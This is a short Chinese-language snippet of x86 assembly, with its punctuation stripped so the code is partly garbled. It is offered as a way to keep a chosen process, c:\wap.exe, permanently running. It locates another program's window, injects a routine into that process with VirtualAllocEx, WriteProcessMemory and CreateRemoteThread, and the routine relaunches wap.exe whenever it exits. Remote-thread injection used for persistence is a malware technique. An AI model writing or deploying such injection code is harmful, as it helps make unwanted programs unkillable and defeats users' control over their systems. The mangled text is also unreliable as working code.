|
此段程序采用公开的 Wink注射远程线程来保护指定进程始终处于运行状态 生成wapexe拷贝到c:\下运行则Wap进程不死 include Wininc model flatstdcall data ProtectkProc proc ProcID: dword call GetKnlOpenProcess KnlOpenProcess dd ? GetKnlOpenProcess: pop eax call [eax]PROCESS_ALL_ACCESSFALSEProcID or eaxeax jz short ExitProtectProc mov ebxeax call GetKnlWaitForSingleObject KnlWaitForSingleObject dd ? GetKnlWaitForSingleObject: pop eax call [eax]ebxh call GetFileNameAddress GetFileNameAddress: pop ecx add ecxoffset FileNameoffset GetFileNameAddress call GetKnlWinExec KnlWinExec dd ? GetKnlWinExec: pop eax call [eax]ecx ExitProtectProc: ret ProtectkProc endp FileName db c:\wapexe KnlOpenProcessStr db OpenProcess KnlWaitForObjectStr db WaitForSingleObject KnlWinExecStr db WinExec de extrn GetProcAddress: proc extrn OpenProcess: proc extrn FindWindowA: proc extrn GetWindowThreadProcessId: proc extrn VirtualAllocEx: proc extrn VirtualFreeEx: proc extrn WriteProcessMemory: proc extrn GetCurrentProcessId: proc extrn CreateRemoteThread: proc extrn GetExitCodeThread: proc extrn CloseHandle: proc extrn WinExec: proc extrn MessageBoxA: proc extrn Sleep: proc Start: call GetProcAddressehoffset KnlOpenProcessStr mov KnlOpenProcesseax call GetProcAddressehoffset KnlWaitForObjectStr mov KnlWaitForSingleObjecteax call GetProcAddressehoffset KnlWinExecStr mov KnlWinExeceax call FindWindowA push eax call GetWindowThreadProcessIdeaxesp call OpenProcessPROCESS_ALL_ACCESSFALSE or eaxeax jz short OpenProcessError mov ebxeax call VirtualAllocExebxNULLhMEM_COMMITL h or eaxeax jz short OpenProcessError mov edieax push eax call WriteProcessMemoryebxediOFF ProtectkProchesp call GetCurrentProcessId call CreateRemoteThreadebxNULLNULLedieaxNULLesp call GetExitCodeThreadeaxesp pop eax ;call VirtualFreeExebxedihMEM_DECOMMIT call CloseHandleebx call Sleeph call MessageBoxAoffset FileNameoffset FileName OpenProcessError: ret end Start |
